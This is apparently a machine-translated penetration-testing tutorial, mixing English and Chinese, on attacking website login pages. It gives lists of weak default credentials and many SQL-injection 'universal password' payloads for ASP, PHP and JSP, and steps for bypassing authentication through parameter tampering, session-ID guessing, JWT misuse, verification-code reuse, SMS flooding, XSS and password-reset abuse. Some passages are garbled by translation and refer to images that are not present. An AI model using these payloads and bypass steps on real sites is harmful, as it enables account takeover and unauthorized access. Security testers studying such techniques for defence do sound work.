Network security | Penetration testing entry case analysis, from zero basic entry to mastery - common detection methods for rapid penetration of login box pages

Today I would like to share with you the commonly used infiltration methods on the login page of the website background, so that everyone can better pay attention to defense in various conveniences when maintaining the website on a daily basis.

1. Weak password

Test method:
You can manually test some high-frequency weak passwords such as the following, 2. According to the third-party components used by the website, look for specific weak passwords or default passwords to log in. Or go directly to BP. It only takes 3S to crack a 6-digit pure digital password using Poly.

admin:123456
admin:admin
admin:admin@123
admin:12345
test:test

In 2022, the Top 20 weak password rankings released by the security department statistics:

2. Universal password bypass

Test Methods:

(1) 用户名输入： ‘ or 1=1 or ‘  密码：任意
(2)Admin’ - -（或‘ or 1=1 or ‘ - -）(admin or 1=1 --) (MS SQL)(直接输入用户名，不进行密码验证)
(3)用户名输入：admin   密码输入：’ or  ‘1’=’1 也可以
(4) 用户名输入：admin' or 'a'='a    密码输入：任意
(5) 用户名输入：‘ or 1=1 - -
(6) 用户名输入：admin‘ or 1=1 - -  密码输入：任意
(7) 用户名输入：1'or'1'='1'or'1'='1   密码输入：任意

asp aspx universal password
  1: "or "a"="a
   2: ')or('a'='a
   3: or 1=1--
   4: 'or 1=1--
   5: a'or' 1 =1--
   6: "or 1=1--
   7: 'or'a'='a
   8: "or"="a'='a
   9: 'or''='
   10: 'or'=' or'
   11: 1 or '1'='1'=1
   12: 1 or '1'='1' or 1=1
   13: 'OR 1=1%00
   14: "or 1=1%00
   15: 'xor
   16: new universal login password
   username' UNION Select 1,1,1 FROM admin Where ''=' (replace table name admin)
   password 1
   Username=-1%cf' union select 1,1,1 as password, 1,1,1 %23
   Password=1
   17..admin' or 'a'='a Password is random

   PHP master password
   'or'='or'
   'or 1=1/* Character type GPC can be used whether it is on or not
   User: something
   Pass: ' OR '1'='1

   jsp master password
   1'or'1'='1
   admin' OR 1=1/*
   User name: admin is only available when this user exists in the system
   Password: 1'or'1'='1

3. Login authentication bypass

Test Methods:

1）直接访问内部URL。使用扫描工具找到含有admin、manager、administrator、login等词语的路径，尝试使用普通的登录用户访问这些URL。从而获得管理员的权限。
2）修改参数绕过认证。应用程序可能会会使用一个参数或一个隐藏的域表示一个用户是否经过验证了，通过修改这些参数，从而被认为是已经认证过的用户。例如：http://www.xxx.xom/userinfo.jsp?authenticated=no，通过修改authenticated参数为yes，http://www.xxx.xom/userinfo.jsp?authenticated=yes，然后就可以通过认证，直接访问内部页面。
3）可猜测的SessionID。利用规律，猜测到一个有效的SessionID，然后通过修改请求中的SessionID为一个预测到的有效的SessionID，从而冒充会话的真正拥有着，绕过认证环节。
4）CSRF。利用CSRF漏洞在用户不知情的情况下，利用用户的会话进行敏感操作，从而绕过认证。
5）前端验证绕过：修改返回码,一般可以尝试true、success、200、0、1等

3.1. Misconfiguration of the token refresh terminal

In this case, when a user logs into the application with valid credentials, an authentication token is created for authentication. And this authentication token expires after some time. A valid auth token appears in the return packet by endpoint/refresh/tokenlogin sending a request to the server with parameters just before it expires .username

3.2. Wrong sso configuration

With the diversity of platforms and the continuous improvement of user needs, in order to facilitate users to log in to multiple applications and websites through one-time user authentication, most platforms use SSO systems. But simply using SSO doesn't automatically secure the system: the SSO configuration must also be secure.

Here, an application authenticates using the Microsoft SSO system. When viewing internal.test.comthe URL, the browser is redirected to the single sign-on system:

3.3.CMS case access problem

CMSs like WordPress, Drupal, and Hubspot also need to be securely configured to avoid such vulnerabilities.

Here is an example of Liferay, which is also based on a coincidence encounter. The app has a login page that can be accessed without authentication.

Liferay uses a portlet as the sso for the application, which has a parameter in the number id p _ p _ id. For portlets, the login portlet can be accessed by changing the parameter to a value of 58. On a normal login page, only the login page is accessible. However, by accessing the portlet directly, it is possible to access Create Accountthe function, which then allows self-registrationthe function to access background content without requiring authorization.

3.4. Error parsing of JWT Token

JWT token or JSON Web Token is widely used in the Web. However, although they have a security mechanism by default, which is the key, it is not certain whether the resolution mechanism of the back-end server is secure enough.

There was a website that was using JWT, and when accessed directly, the application redirected the user to Microsoft SSO the webpage.

However, some JS files can be accessed without authentication. While testing it was found that the application uses JWT tokens which are sent through the system after a secure login Microsoft SSO. In the backend mechanism, there was a security misconfiguration that didn't check if the JWT token was generated for a specific application - instead, it accepted any JWT token with a valid signature. Here's an example using a JWT token from Microsoft's website:

3.5. Violent modification of Authentication

In this case, a base64-encoded XML request is sent to the backend for validation. On the login mechanism, it sends the username and password separately. The value in the Scode parameter is the md5 value of the password. . There is another interesting flag in the request: scode has a value of 2.

It turned out that authentication could be bypassed simply by providing a username and an empty password.

4. The graphic verification code is not invalid

Test Methods:

输入用户名、密码、验证码后，点击登陆按钮同时将数据包使用burpsuite进行拦截，并使用Repeater模块或Intruder模块进行数据重放，重新发送五次观察页面变化，是否会提示验证码输入错误等信息

5. SMS verification code is not invalid

Test Methods:

1）请求发送短信，填写任意验证码，然后提交其他操作请求，将验证码参数置空或删除，测试是否可绕过检测；
2）尝试特权验证码，如000000、111111等；
3）同一个短信验证码是否能使用多次；

6. SMS attack

Test Methods:

1）手工找到有关网站注册页面，认证页面，是否具有短信发送页面，如果有，则进行下一步。
2）通过利用burp或者其它抓包截断工具，抓取发送验证码的数据包，并且进行重放攻击，查看手机是否在短时间内连续收到10条以上短信，如果收到大量短信，则说明存在该漏洞。

7. Reflective cross-site scripting attack

Test Methods:

1、GET方式跨站脚本：
在输入的参数后逐条添加以下语句，以第一条为例，输入http://www.exmaple.com/page.xxx?name=
文本输入框：需要对页面上所有可以提交参数的地方进行测试。具体跨站脚本的测试语句根据实际情况的不同而不同，可自行构造。
2、POST方式
例如：抓包对输入的参数进行构造语句触发XSS

8. SQL injection

Test Methods:

1）通过web漏洞扫描工具进行对网站爬虫后得到的所有链接进行检测，或者手工判断是否存在注入点，一旦确认存在漏洞，可利用自动化工具sqlmap去尝试注入。几种常见的判断方法：
a、数字型。
http://host/test.php?id=100 and 1=1 返回成功
http://host/test.php?id=100 and 1=2 返回失败
b、字符型。
http://host/test.php?name=rainman ’ and ‘1’=‘1 返回成功
http://host/test.php?name=rainman ’ and ‘1’=‘2 返回失败
c、搜索型。
搜索型注入：简单的判断搜索型注入漏洞是否存在的办法是：
先搜索（’），如果出错，说明90%存在这个漏洞。
然后搜索（%），如果正常返回，说明95%有洞了。
然后再搜索一个关键字，比如（2006）吧，正常返回所有2006相关的信息。
再搜索（2006%‘and 1=1 and ‘%’=’）和（2006%‘and 1=2 and ‘%’=’）

Or directly enter the user name in the login box and enter 'to see if a database error is reported

9. Any user password modification/reset

Test method:
The procedure for password modification is generally to first verify whether the user's original password is correct, and then ask the user to enter a new password. There are roughly three ways to bypass the password modification mechanism:

1）如果输入新密码的接口可以直接访问，那么在未知原始密码的的情况下即可直接修改密码，通常知道了他人的用户名即可任意修改他人的密码。
2）如果系统未校验修改密码的用户身份，那么在提交修改密码请求时，攻击者通过输入密码，将用户名或者用户ID修改为其他人的，即可成功修改他人的密码。
3）当修改密码时系统需要电子邮件或者手机短信确认，而应用程序未校验用户输入的邮箱和手机号，那么攻击者通过填写自己的邮箱或手机号接收修改密码的链接和验证码，以此修改他人的密码。

10. Sensitive Information Leakage

Test Methods:

1）如果比较有耐心的话可以找一下页面源码、JS文件，全局搜索password,userlogin等一些敏感词等可能存在意想不到的收获
2）查找URL信息是为了找到账号密码验证成功后跳转的URL地址，然后尝试访问此地址，看是否出现未授权访问漏洞
此处已显示账号密码验证成功后的跳转地址，直接访问此地址看是否可以未授权访问。

11. Directory traversal

Test Methods:

可以利用web漏洞扫描器扫描web应用进行检测，也可通过搜索，网站标题包含“index of”关键词的网站进行访问。

12. Framework loopholes

The common framework vulnerabilities are as follows: I will not explain them one by one here.

Spring框架漏洞
Struts2框架漏洞
ThinkPHP 框架漏洞
shiro框架漏洞